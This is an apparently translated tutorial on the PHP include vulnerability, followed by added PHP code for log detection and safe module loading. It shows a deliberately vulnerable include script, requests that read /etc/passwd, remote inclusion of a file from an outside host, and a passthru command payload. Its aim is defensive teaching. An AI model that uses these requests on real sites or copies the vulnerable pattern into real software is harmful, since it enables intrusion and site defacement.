
PHP include vulnerability: from theory to practice

In this article I will tell you about one of the most widespread vulnerabilities found in PHP scripts: the include "bug". You will learn both how it works and several ways of eliminating this vulnerability.


Attention!!! The information presented in this article is provided purely for informational purposes! The author bears no responsibility for its malicious use!


The theory


The PHP include vulnerability is one of the best-known, yet still one of the most widespread "holes" found in PHP scripts today. It arises when, through carelessness, ignorance, or some other reason known only to himself, the programmer lets data passed to the script as parameters be used, without any additional check (such data is also called "tainted"), as the argument of the include function. To understand how this vulnerability works, you first need some idea of what that function does.


The PHP function include (and also include_once)


This function is used to attach additional program modules to a running PHP script. Moreover, unlike the similar require, include executes these modules directly in the course of the script's own run. Consequently, modules attached in this way are executed not as separate scripts but as parts of the script that included them. More precisely, include will execute only that part of the file which is enclosed between the special tags:


"<?php" or "<?"

"?>"


Everything else PHP simply outputs as text. That is, if you include a text file (for example /etc/passwd :)) that does not contain the tags above, the entire contents of that file will be output by the interpreter.


Example of a call:


include($file);


As you have probably noticed, include takes only one parameter ($file), which specifies the path and name of the file of the module being attached. It should also be noted that on Unix-like systems (depending on the PHP settings) the parameter can be not only a path and file name but also the URL (Internet address) of a file (!!!).


Practice


Let's assume that on some web server the following PHP script is installed (its URL is http://www.superpupersite.com/index.php):



<?php
// Vulnerable on purpose: the "file" parameter goes straight into include() without any check
// ($HTTP_GET_VARS is the old name of today's $_GET array)
include($HTTP_GET_VARS["file"]);
?>


And also a set of various attached scripts (modules) for it:


home.php

feedback.php

...


The author of this script assumed that all visitors of the site would peacefully go from one page to another by clicking buttons, links and other controls, and that the script, depending on the file parameter passed to it, would attach one module or another, thereby generating the various HTML pages (this is how include is most often used).


Example requests:


http://www.superpupersite.com/index.php?file=home.php

http://www.superpupersite.com/index.php?file=feedback.php


He could not even imagine that one cold winter's day a certain inquisitive Vasya Pupkin would come to the site. Looking at these links out of curiosity, Vasya would assume (while not yet knowing how things really stand) that the file parameter is nothing other than the path and name of a file, and that the script uses the include function (not surprising, since today include is used in almost every third script). Vasya decided to check his assumption right away, as follows:


He sent a request of the form: http://www.superpupersite.com/index.php?file=/etc/passwd

In the output he received the contents of the server's passwd file.

P.S. If debug mode is enabled in the PHP options on the server, spotting such a vulnerability takes no special effort thanks to the characteristic error messages (like: "failed opening 'filename' for inclusion..."). But in this case debug mode was switched off (every dog has his day).


"Great! It is quite likely that my assumption about include is correct!" thought Vasya. Vasya also noticed that the server runs under a Unix-like operating system (it has a /etc/passwd file). From all this he concluded that it would probably be possible to feed the script a PHP module of his own so that it would be executed on the server side. Now, to carry out his sinister plans, V. Pupkin needs access that lets him add and edit files on some web server. Fortunately, getting a slow, free hosting account today is no great problem, and for such unexpected :) occasions in life our hero already had the site http://pupkin.halava123.ru set aside, where he prudently uploaded a script with the following contents:



<? passthru("ls -al"); ?>


A simple script, it must be said, that prints in the browser window the list of files and directories in the current directory (but to confirm the vulnerability this is enough :)). The script was placed at the address:


http://pupkin.halava123.ru/cmd.txt


Vasya then made the following request:


http://www.superpupersite.com/index.php?file=http://pupkin.halava123.ru/cmd.txt


And it worked! As expected, he saw the list of files and directories in the browser window. It went on from there: the "hole" was exploited further, and no less interesting scripts came into play, whose detailed description would take up a lot of space and is therefore not given here :). Anyway, sooner or later, it all ended in a deface (a deface is the replacement of the site's home page). A sad story!
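A defender reading the story above will want to spot such requests in the web-server access log rather than learn about them from a defaced home page. The following is an added example, not code from the article: a small PHP CLI script that pulls the file parameter out of combined-log-format lines and flags values that look like a path or a URL instead of a plain module name. The log lines are constructed for illustration.

```php
<?php
// Added example, not part of the original article: scan web-server access-log
// lines for requests whose "file" parameter looks like a path or a URL instead
// of a plain module name. The log lines below are constructed for illustration.

// Returns a short reason when the parameter value looks suspicious, or null
// when it looks like an ordinary module name.
function classifyFileParam(string $value): ?string
{
    // A full URL (http://, ftp://, php://, ...) means an attempt to include a remote file.
    if (preg_match('~^[a-z][a-z0-9+.-]*://~i', $value)) {
        return 'remote URL in file parameter';
    }
    // An absolute path or a ".." component means an attempt to read outside the module directory.
    if ($value !== '' && ($value[0] === '/' || strpos($value, '..') !== false)) {
        return 'path outside module directory';
    }
    // Anything but a simple name such as home.php or feedback is worth a look.
    if (!preg_match('~^[A-Za-z0-9_-]+(\.php)?$~', $value)) {
        return 'unexpected characters in file parameter';
    }
    return null;
}

// Pulls the decoded "file" query parameter out of one combined-log-format line,
// or returns null when the line carries no such parameter.
function extractFileParam(string $logLine): ?string
{
    if (!preg_match('~"(?:GET|POST) (\S+) HTTP/\d\.\d"~', $logLine, $m)) {
        return null;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return null;
    }
    parse_str(substr($m[1], $qpos + 1), $params); // also decodes %2F, %2e and friends
    return isset($params['file']) ? (string) $params['file'] : null;
}

// Constructed sample log, modelled on the requests described in the article.
$sampleLog = [
    '10.0.0.5 - - [01/Jan/2003:12:00:00 +0300] "GET /index.php?file=home.php HTTP/1.0" 200 512',
    '10.0.0.5 - - [01/Jan/2003:12:00:01 +0300] "GET /index.php?file=feedback.php HTTP/1.0" 200 640',
    '10.0.0.9 - - [01/Jan/2003:12:05:00 +0300] "GET /index.php?file=/etc/passwd HTTP/1.0" 200 1800',
    '10.0.0.9 - - [01/Jan/2003:12:06:00 +0300] "GET /index.php?file=http://pupkin.halava123.ru/cmd.txt HTTP/1.0" 200 2048',
    '10.0.0.9 - - [01/Jan/2003:12:07:00 +0300] "GET /index.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 1800',
];

foreach ($sampleLog as $line) {
    $param = extractFileParam($line);
    if ($param === null) {
        continue;
    }
    $reason = classifyFileParam($param);
    echo ($reason === null ? 'ok   ' : 'ALERT') . "  file=$param" . ($reason ? "  ($reason)" : '') . "\n";
}
```

The first two lines are reported as ok, the other three as ALERT. The percent-decoding in parse_str matters: the last request would slip past a naive string search for "../" in the raw log line.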


Fighting back against the wrecker


Having read all of the above, many of you will have asked: "Are there ways to fight this terrible vulnerability?" "Yes," I proudly answer :). Some (by no means all) of them:


The simplest way, from the programming point of view, is to convert the variable $module to a numeric type (settype($module, "integer")), but then you have to number the modules and gather them in one directory ("module1.php", "module2.php" ... "module<n>.php").


A more complex method of pest control :), in terms of implementation, is to create a separate file with the list of modules that are allowed to be run. Then, depending on whether a given module is in the list, either run it or output a corresponding error (or run the default module, or, if you want to frighten the "experimenter", output a message saying that his address has been logged and that he had better start drying rusks for prison...).

Example:



<?php
switch ($case)   // $case is the name of the variable passed to the script as a parameter
{
    case "news":
        include("news.php");
        break;

    case "articles":
        include("guestbook.php");
        break;

    // ... and so on

    default:
        // if $case holds none of the values listed above, the main page is opened
        include("index.php");
        break;
}
?>


The third method is something in between the first and the second. You replace all special characters ("..", "/", " ") with, for example, dashes. True, in this case the modules (only the executable modules and nothing else should be kept there!!!) must be located in one directory, but their names can be normal words (for example "news", "guestbook", etc.).
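As an added example (my code, not the article's), here are the three methods above written as PHP functions so that they can be compared side by side on the same inputs. MODULE_DIR and the module names are assumptions made for this example, the article's settype($module, "integer") is replaced by the equivalent (int) cast, and method 3 goes one step further than the article by also checking with realpath() that the resolved file really lies inside the module directory.

```php
<?php
// Added example, not part of the original article: the three countermeasures
// described above written as functions. MODULE_DIR and the module names are
// assumptions made for this example; the article's settype($module, "integer")
// is replaced here by an equivalent (int) cast. Requires PHP 7.1 or newer.

const MODULE_DIR = __DIR__ . '/modules';

// Method 1: numbered modules. After the integer cast the user controls only which
// of module1.php ... moduleN.php is chosen, and the range check rejects the rest.
function moduleByNumber($param, int $moduleCount): ?string
{
    $n = (int) $param;                  // "3" -> 3, "3abc" -> 3, "../etc/passwd" -> 0
    if ($n < 1 || $n > $moduleCount) {
        return null;                    // out of range: caller falls back to the default
    }
    return MODULE_DIR . "/module{$n}.php";
}

// Method 2: a list of permitted modules (inline here; the article suggests keeping
// it in a separate file). Only an exact, case-sensitive match is accepted.
function moduleByList($param, array $allowed): ?string
{
    $name = (string) $param;
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    return MODULE_DIR . "/{$name}.php";
}

// Method 3: replace the path characters the article names ("..", "/", space) with
// dashes, keep only plain-word names, and additionally confirm that the resolved
// file really lies inside MODULE_DIR before handing it to include().
function moduleBySanitizedName($param): ?string
{
    $name = str_replace(['..', '/', '\\', ' '], '-', (string) $param);
    if (!preg_match('~^[A-Za-z0-9_-]+$~', $name)) {
        return null;                    // e.g. "http:--host-cmd.txt" still fails here
    }
    $base = realpath(MODULE_DIR);
    $path = realpath(MODULE_DIR . "/{$name}.php");
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                    // no such module, or it resolved outside MODULE_DIR
    }
    return $path;
}

// In index.php you would use one of them with a default, as the switch example does:
//   include(moduleByList($_GET['file'] ?? '', ['home', 'news', 'guestbook']) ?? MODULE_DIR . '/index.php');

// Constructed inputs, modelled on the requests in the article, to show what each method does with them.
$allowed = ['home', 'news', 'guestbook', 'feedback'];
$inputs = ['home', '3', '/etc/passwd', '../../etc/passwd', 'http://pupkin.halava123.ru/cmd.txt'];
foreach ($inputs as $input) {
    printf("%-36s  number: %-28s  list: %-28s  sanitized: %s\n",
        $input,
        moduleByNumber($input, 5) ?? 'REJECT',
        moduleByList($input, $allowed) ?? 'REJECT',
        moduleBySanitizedName($input) ?? 'REJECT');
}
```

Run from the command line, the script prints one row per input: only "3" passes method 1, only "home" passes method 2, and method 3 returns a path only for names whose file actually exists under MODULE_DIR (with no modules directory present every row shows REJECT for it). The realpath() containment check is worth keeping even when the character filter looks complete, because it does not depend on the filter anticipating every way of writing a path.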

The conclusion


That is all I wanted to tell you this time. The conclusion from all this is: before using data received from the user in your web scripts, think about whether it should first be checked and properly processed. This concerns not only the form fields transmitted by the browser (the GET and POST methods) but also cookies (an attacker can get at those too).